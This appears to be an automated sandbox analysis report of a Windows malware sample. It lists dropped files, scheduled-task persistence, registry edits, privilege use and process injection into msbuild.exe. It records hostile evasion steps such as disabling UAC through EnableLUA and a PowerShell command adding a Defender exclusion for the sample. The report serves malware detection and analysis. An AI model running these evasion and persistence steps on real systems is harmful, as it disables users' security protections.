File created	C:\Program Files (x86)\DQANlvmTAvZU2\YTcLPAZ.xml	OfDMGxv.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	GIjqVmx.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\YDihxGf.xml	OfDMGxv.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\TESVjbd.xml	OfDMGxv.exe
File created	C:\Program Files (x86)\ADJLsahCU\thLfhOD.xml	OfDMGxv.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	GIjqVmx.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	GIjqVmx.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\CxeqGrT.dll	GIjqVmx.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\NsvEbOL.xml	GIjqVmx.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\ekgfRDz.xml	GIjqVmx.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\HpvIcDK.dll	OfDMGxv.exe
File created	C:\Program Files (x86)\ADJLsahCU\YuFyZF.dll	OfDMGxv.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	GIjqVmx.exe
File created	C:\Program Files (x86)\ADJLsahCU\xlhLnfp.xml	GIjqVmx.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\klckyqY.dll	GIjqVmx.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\CGKgQjQ.dll	OfDMGxv.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\LisJtGh.dll	OfDMGxv.exe
File created	C:\Program Files (x86)\ADJLsahCU\LCxSic.dll	GIjqVmx.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	KILAV28QqdA8TFWpDnxeBfib.exe
File created	C:\Windows\rss\csrss.exe	KILAV28QqdA8TFWpDnxeBfib.exe
File created	C:\Windows\rss\csrss.exe	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
File opened for modification	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	mrWPwq1DxmIkQjCy6MM3QmVj.exe
File created	C:\Windows\rss\csrss.exe	5vIOb5zhVQZLutv70Z4zhxHI.exe
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File created	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File opened for modification	C:\Windows\rss	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File opened for modification	C:\Windows\rss	mrWPwq1DxmIkQjCy6MM3QmVj.exe
File opened for modification	C:\Windows\rss	5vIOb5zhVQZLutv70Z4zhxHI.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\rrqYunoktxOQmCoCX.job	schtasks.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1532	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3wc.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3wc.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3wc.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u3wc.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u3wc.0.exe

Creates scheduled task(s) 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4428	schtasks.exe
2336	schtasks.exe
4004	schtasks.exe
1720	schtasks.exe
4724	schtasks.exe
5668	schtasks.exe
5740	schtasks.exe
1464	schtasks.exe
5624	schtasks.exe
5872	schtasks.exe
5068	schtasks.exe
5988	schtasks.exe
3252	schtasks.exe
5516	schtasks.exe
5580	schtasks.exe
6040	schtasks.exe
648	schtasks.exe
392	schtasks.exe
5212	schtasks.exe
5712	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	148	Go-http-client/1.1
HTTP User-Agent header	151	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	KILAV28QqdA8TFWpDnxeBfib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{39cd0eda-0000-0000-0000-d01200000000}\NukeOnDelete = "0"	Install.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	GIjqVmx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	KILAV28QqdA8TFWpDnxeBfib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	KILAV28QqdA8TFWpDnxeBfib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-352 = "FLE Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	KILAV28QqdA8TFWpDnxeBfib.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2864	powershell.exe
2864	powershell.exe
2864	powershell.exe
1700	u3wc.0.exe
1700	u3wc.0.exe
4224	powershell.exe
4224	powershell.exe
4832	powershell.exe
4832	powershell.exe
4548	powershell.exe
4548	powershell.exe
4224	powershell.exe
2148	powershell.exe
2148	powershell.exe
4832	powershell.exe
4548	powershell.exe
2148	powershell.exe
4224	powershell.exe
4548	powershell.exe
4832	powershell.exe
2148	powershell.exe
2616	KILAV28QqdA8TFWpDnxeBfib.exe
2616	KILAV28QqdA8TFWpDnxeBfib.exe
1952	5vIOb5zhVQZLutv70Z4zhxHI.exe
1952	5vIOb5zhVQZLutv70Z4zhxHI.exe
2284	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
2284	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
4720	mrWPwq1DxmIkQjCy6MM3QmVj.exe
4720	mrWPwq1DxmIkQjCy6MM3QmVj.exe
5736	powershell.exe
5736	powershell.exe
5804	powershell.exe
5804	powershell.exe
5792	powershell.exe
5792	powershell.exe
5736	powershell.exe
5948	powershell.exe
5948	powershell.exe
5792	powershell.exe
5804	powershell.exe
5948	powershell.exe
5736	powershell.exe
5792	powershell.exe
5804	powershell.exe
5948	powershell.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeIncreaseQuotaPrivilege	2864	powershell.exe
Token: SeSecurityPrivilege	2864	powershell.exe
Token: SeTakeOwnershipPrivilege	2864	powershell.exe
Token: SeLoadDriverPrivilege	2864	powershell.exe
Token: SeSystemProfilePrivilege	2864	powershell.exe
Token: SeSystemtimePrivilege	2864	powershell.exe
Token: SeProfSingleProcessPrivilege	2864	powershell.exe
Token: SeIncBasePriorityPrivilege	2864	powershell.exe
Token: SeCreatePagefilePrivilege	2864	powershell.exe
Token: SeBackupPrivilege	2864	powershell.exe
Token: SeRestorePrivilege	2864	powershell.exe
Token: SeShutdownPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeSystemEnvironmentPrivilege	2864	powershell.exe
Token: SeRemoteShutdownPrivilege	2864	powershell.exe
Token: SeUndockPrivilege	2864	powershell.exe
Token: SeManageVolumePrivilege	2864	powershell.exe
Token: 33	2864	powershell.exe
Token: 34	2864	powershell.exe
Token: 35	2864	powershell.exe
Token: 36	2864	powershell.exe
Token: SeDebugPrivilege	376	msbuild.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	2616	KILAV28QqdA8TFWpDnxeBfib.exe
Token: SeImpersonatePrivilege	2616	KILAV28QqdA8TFWpDnxeBfib.exe
Token: SeDebugPrivilege	1952	5vIOb5zhVQZLutv70Z4zhxHI.exe
Token: SeImpersonatePrivilege	1952	5vIOb5zhVQZLutv70Z4zhxHI.exe
Token: SeDebugPrivilege	2284	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
Token: SeImpersonatePrivilege	2284	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
Token: SeDebugPrivilege	4720	mrWPwq1DxmIkQjCy6MM3QmVj.exe
Token: SeImpersonatePrivilege	4720	mrWPwq1DxmIkQjCy6MM3QmVj.exe
Token: SeDebugPrivilege	5736	powershell.exe
Token: SeDebugPrivilege	5792	powershell.exe
Token: SeDebugPrivilege	5804	powershell.exe
Token: SeDebugPrivilege	5948	powershell.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	5920	powershell.exe
Token: SeDebugPrivilege	5856	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	708	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	5972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1140	csrss.exe
Token: SeDebugPrivilege	6128	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeSecurityPrivilege	1532	sc.exe
Token: SeSecurityPrivilege	1532	sc.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	5844	powershell.exe
Token: SeIncreaseQuotaPrivilege	4540	WMIC.exe
Token: SeSecurityPrivilege	4540	WMIC.exe
Token: SeTakeOwnershipPrivilege	4540	WMIC.exe
Token: SeLoadDriverPrivilege	4540	WMIC.exe
Token: SeSystemProfilePrivilege	4540	WMIC.exe
Token: SeSystemtimePrivilege	4540	WMIC.exe
Token: SeProfSingleProcessPrivilege	4540	WMIC.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe
5140	u3wc.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1104 wrote to memory of 2864	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	74
PID 1104 wrote to memory of 2864	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	74
PID 1104 wrote to memory of 4144	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	76
PID 1104 wrote to memory of 4144	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	76
PID 1104 wrote to memory of 4144	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	76
PID 1104 wrote to memory of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77
PID 1104 wrote to memory of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77
PID 1104 wrote to memory of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77
PID 1104 wrote to memory of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77
PID 1104 wrote to memory of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77
PID 1104 wrote to memory of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77
PID 1104 wrote to memory of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77
PID 1104 wrote to memory of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77
PID 376 wrote to memory of 5052	376	msbuild.exe	81
PID 376 wrote to memory of 5052	376	msbuild.exe	81
PID 376 wrote to memory of 5052	376	msbuild.exe	81
PID 376 wrote to memory of 2616	376	msbuild.exe	82
PID 376 wrote to memory of 2616	376	msbuild.exe	82
PID 376 wrote to memory of 2616	376	msbuild.exe	82
PID 376 wrote to memory of 2284	376	msbuild.exe	83
PID 376 wrote to memory of 2284	376	msbuild.exe	83
PID 376 wrote to memory of 2284	376	msbuild.exe	83
PID 376 wrote to memory of 1952	376	msbuild.exe	84
PID 376 wrote to memory of 1952	376	msbuild.exe	84
PID 376 wrote to memory of 1952	376	msbuild.exe	84
PID 376 wrote to memory of 4720	376	msbuild.exe	423
PID 376 wrote to memory of 4720	376	msbuild.exe	423
PID 376 wrote to memory of 4720	376	msbuild.exe	423
PID 5052 wrote to memory of 1700	5052	XTz0VIeuIV1rlz8hoaYk7Ojd.exe	87
PID 5052 wrote to memory of 1700	5052	XTz0VIeuIV1rlz8hoaYk7Ojd.exe	87
PID 5052 wrote to memory of 1700	5052	XTz0VIeuIV1rlz8hoaYk7Ojd.exe	87
PID 2616 wrote to memory of 4224	2616	KILAV28QqdA8TFWpDnxeBfib.exe	409
PID 2616 wrote to memory of 4224	2616	KILAV28QqdA8TFWpDnxeBfib.exe	409
PID 2616 wrote to memory of 4224	2616	KILAV28QqdA8TFWpDnxeBfib.exe	409
PID 4720 wrote to memory of 4832	4720	mrWPwq1DxmIkQjCy6MM3QmVj.exe	91
PID 4720 wrote to memory of 4832	4720	mrWPwq1DxmIkQjCy6MM3QmVj.exe	91
PID 4720 wrote to memory of 4832	4720	mrWPwq1DxmIkQjCy6MM3QmVj.exe	91
PID 2284 wrote to memory of 4548	2284	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	93
PID 2284 wrote to memory of 4548	2284	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	93
PID 2284 wrote to memory of 4548	2284	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	93
PID 1952 wrote to memory of 2148	1952	5vIOb5zhVQZLutv70Z4zhxHI.exe	390
PID 1952 wrote to memory of 2148	1952	5vIOb5zhVQZLutv70Z4zhxHI.exe	390
PID 1952 wrote to memory of 2148	1952	5vIOb5zhVQZLutv70Z4zhxHI.exe	390
PID 5368 wrote to memory of 5736	5368	KILAV28QqdA8TFWpDnxeBfib.exe	407
PID 5368 wrote to memory of 5736	5368	KILAV28QqdA8TFWpDnxeBfib.exe	407
PID 5368 wrote to memory of 5736	5368	KILAV28QqdA8TFWpDnxeBfib.exe	407
PID 5464 wrote to memory of 5792	5464	5vIOb5zhVQZLutv70Z4zhxHI.exe	105
PID 5464 wrote to memory of 5792	5464	5vIOb5zhVQZLutv70Z4zhxHI.exe	105
PID 5464 wrote to memory of 5792	5464	5vIOb5zhVQZLutv70Z4zhxHI.exe	105
PID 5520 wrote to memory of 5804	5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	106
PID 5520 wrote to memory of 5804	5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	106
PID 5520 wrote to memory of 5804	5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	106
PID 5656 wrote to memory of 5948	5656	mrWPwq1DxmIkQjCy6MM3QmVj.exe	109
PID 5656 wrote to memory of 5948	5656	mrWPwq1DxmIkQjCy6MM3QmVj.exe	109
PID 5656 wrote to memory of 5948	5656	mrWPwq1DxmIkQjCy6MM3QmVj.exe	109
PID 5464 wrote to memory of 5408	5464	5vIOb5zhVQZLutv70Z4zhxHI.exe	111
PID 5464 wrote to memory of 5408	5464	5vIOb5zhVQZLutv70Z4zhxHI.exe	111
PID 5408 wrote to memory of 5128	5408	cmd.exe	279
PID 5408 wrote to memory of 5128	5408	cmd.exe	279
PID 5520 wrote to memory of 3112	5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	114
PID 5520 wrote to memory of 3112	5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	114
PID 3112 wrote to memory of 3248	3112	cmd.exe	116
PID 3112 wrote to memory of 3248	3112	cmd.exe	116
PID 5520 wrote to memory of 3728	5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe	117

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe
"C:\Users\Admin\AppData\Local\Temp\15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
  2⤵
  PID:4144
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:376
